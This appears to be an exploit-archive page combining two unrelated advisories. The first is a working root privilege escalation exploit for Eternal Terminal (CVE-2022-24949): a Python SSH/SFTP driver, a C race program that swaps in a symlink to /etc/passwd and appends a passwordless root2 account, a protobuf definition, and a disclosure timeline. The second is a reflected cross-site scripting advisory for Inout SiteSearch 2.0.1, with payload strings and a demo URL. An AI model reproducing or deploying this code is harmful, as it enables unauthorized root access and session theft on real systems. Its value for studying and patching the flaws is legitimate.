        a6 31 f9 6d ee df c1 65 63 55 26 ae e5 11 5d a9 df 15 d7 45 12 a4 df 3e 8f \
        40 54 51 ab 2c 8a 0d 88 ae 3d 44 c5 0c 2a c5 0a bc 60 48 df 01 f8 70 fb be \
        dc 62 cb 36 a4 42 11 5c fc ac")
        connection.sendall(packet)
    
    if __name__ == "__main__":
        #Initialize SSH/SFTP connection
        print("[*] Initializing SSH connection")
        ssh = initialize_ssh_connection(args.host, args.user, args.sshport)
        print("[*] Initializing SFTP connection")
        sftp = initialize_ssh_connection(args.host, args.user, args.sshport).open_sftp()
    
    
        #Clean up previous race binary
        print("[*] Cleaning up previous race binary")
        stdin, stdout, stderr = ssh.exec_command('rm -rf ~/race')
        exit_status = stdout.channel.recv_exit_status()
        #print(stdout.read().splitlines())
    
        print("[*] Killing previous race processes")
        stdin, stdout, stderr = ssh.exec_command('pkill race')
        exit_status = stdout.channel.recv_exit_status()
    
        #Get home directory
        print("[*] Getting home directory")
        stdin, stdout, stderr = ssh.exec_command('echo $HOME')
        exit_status = stdout.channel.recv_exit_status()
        home = stdout.read().splitlines()[0].decode('utf-8')
    
        #Copy new binary over
        print("[*] Copying new race binary over")
        sftp.put(args.racepath, f'{home}/race')
    
        #Run race binary
        print("[*] Running race utility in background")
        stdin, stdout, stderr = ssh.exec_command(f'chmod +x {home}/race && {home}/race&')
        exit_status = stdout.channel.recv_exit_status()
        #TODO: modify to wait for return from race binary to create 2.0G passwd file
        time.sleep(5)
    
        #Registering random id/key
        print("[*] Registering id/key on ET server")
        id = '25F81F3CC230D45B'
        key = 'E59AD03E34FC3AB9DED568F47EA27677'
        cmd = f'echo \'{id}/{key}_xterm-256color\n\' | etterminal&'
        stdin, stdout, stderr = ssh.exec_command(cmd)
        exit_status = stdout.channel.recv_exit_status()
        stdout.read().splitlines()
    
        #Setup ET socket connetion
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as connection:
    
            connection.connect((args.host, args.etport))
            print("[*] Initiating client connection")
            initiate_client_connection(id, connection) #TerminalClient.cpp:140
            print("[*] Sending payload")
            send_initial_payload(connection, key)
            print("[*] You can log in as root2 on the target machine without a password, try it!")
    

This C file should be compiled statically and run locally on the target server.

    #include <sys/inotify.h>
    #include <stdio.h>
    #include <unistd.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <fcntl.h>
    #include <string.h>
    #include <sys/stat.h>
    #include <sys/types.h>
    
    #define EVENT_SIZE  ( sizeof (struct inotify_event) ) /*size of one event*/
    #define MAX_EVENTS 4096/* Maximum number of events to process*/
    #define LEN_NAME 4  /* Assuming that the length of the filename */
    #define BUF_LEN     ( MAX_EVENTS * ( EVENT_SIZE + LEN_NAME ))
    
    int fd,wd;
    void sig_handler(int sig){
           inotify_rm_watch( fd, wd );
           close( fd );
           exit( 0 );
    }
    
    int main(int argc, char *argv[])
    {
    	//Cleanup previous exploit attempts
    	printf("[*] Cleaning up previous exploit attempts\n");
    	system("/bin/rm -rf /tmp/aaa");
    	system("mkdir -p /tmp/aaa/etc");
    	system("touch /tmp/aaa/etc/passwd");
    	printf("[*] Making large file for unlink race\n");
    	system("yes | dd of=/tmp/aaa/etc/passwd bs=1M iflag=fullblock count=2048");
    
        // watch the tmp/aaa/etc folder for the creation of the socket file
        char *path = "/tmp/aaa/etc";
        signal(SIGINT,sig_handler);
    
        fd = inotify_init();
    
        if (fcntl(fd, F_SETFL, O_NONBLOCK) < 0)
        exit(2);
    
        wd = inotify_add_watch(fd,path,IN_DELETE);
        if(wd==-1){
    	printf("Could not watch\n");
        }
        else {
    	printf("Watching...\n");
        }
    
        while(1) {
    	int i=0, length;
    	char buffer[BUF_LEN];
    
    	length = read(fd,buffer,BUF_LEN);
    
    	while(i<length){
    	    struct inotify_event *event = (struct inotify_event *) &buffer[i];
    		if(event->len){
    		    if (strcmp(event-> name,"passwd") == 0) {
    			if ( event->mask & IN_DELETE ) {
    			    rename("/tmp/aaa/etc", "/tmp/aaa/etcc");
    			    symlink("/etc", "/tmp/aaa/etc");
    
    			    printf("[*] Waiting to overwrite /etc/passwd\n");
    			    int i = 0;
    			    while(i < 3) {
    
    				if (access("/etc/passwd", W_OK)  == 0) {
    				    // Add malicious entry to passwd and login as user
    				    printf("[*] Adding entry root2 with no password");
    				    char * entry = "root2::0:0:root:/root:/bin/bash";
    				    FILE * pFile = fopen("/etc/passwd", "a");
    				    fprintf(pFile, entry);
    				    fclose(pFile);
    				    exit(1);
    				}
    				printf("[*] Waiting...\n");
    				sleep(1);
    				i = i + 1;
    			    }
    			    printf("[*] Something went wrong, try again!\n");
    			    exit(-1);
    			}
    			}
    		    
    		    i += EVENT_SIZE + event->len;
    		}
    	}
    }
    }
    

This protobuf file should be compiled using protoc and used as a reference for the python file.

    //ET.proto
    syntax = "proto2";
    package et;
    option optimize_for = LITE_RUNTIME;
    
    enum EtPacketType {
      // Count down from 254 to avoid collisions
      HEARTBEAT = 254;
      INITIAL_PAYLOAD = 253;
      INITIAL_RESPONSE = 252;
    }
    
    message ConnectRequest {
      optional string clientId = 1;
      optional int32 version = 2;
    }
    
    enum ConnectStatus {
      NEW_CLIENT = 1;
      RETURNING_CLIENT = 2;
      INVALID_KEY = 3;
      MISMATCHED_PROTOCOL = 4;
    }
    
    message ConnectResponse {
      optional ConnectStatus status = 1;
      optional string error = 2;
    }
    
    message SequenceHeader { optional int32 sequenceNumber = 1; }
    
    message CatchupBuffer { repeated bytes buffer = 1; }
    
    message SocketEndpoint {
      optional string name = 1;
      optional int32 port = 2;
    }
    

**Timeline:**

10/29/21: Vulnerabilities were disclosed to author of ET  
11/3/21: Partial fixes for the most serious issues to ET were released (including this one)  
1/27/22: 90 day deadline for public disclosure reached

CVE-2022-24949: Eternal Terminal Root Privilege Escalation

Inout SiteSearch version 2.0.1 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                        │ │                                         :│  Website  : inoutscripts.com               │ │                                         ││  Vendor   : Inout Scripts                  │ │                                         ││  Software : Inout SiteSearch 2.0.1         │ │ Inout SiteSearch is a premium script    ││  Vuln Type: Cross Site Scripting Reflected │ │ that allows you to add a site           ││  Method   : GET                            │ │ search feature                          ││  Impact   : Manipulate the content of      │ │                                         ││             the site                       │ │                                         ││────────────────────────────────────────────┘ └─────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL     Phr33k , NK, GoldenX, Wehla, Cap, DarkCatSpace, R0ot, KnG, Centerk, chamanwal  loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y, ix7         CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'searchkeyword' is vulnerable to XSShttp://inout-sitesearch.demo.inoutscripts.net/index.php/search/result?searchkeyword=[XSS]Some XSS Payloads Reflectedjavascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'><IMG """><SCRIPT>alert("XSS")</SCRIPT>"\></TITLE><SCRIPT>alert("XSS");</SCRIPT>[-] Done

Tag

#ssh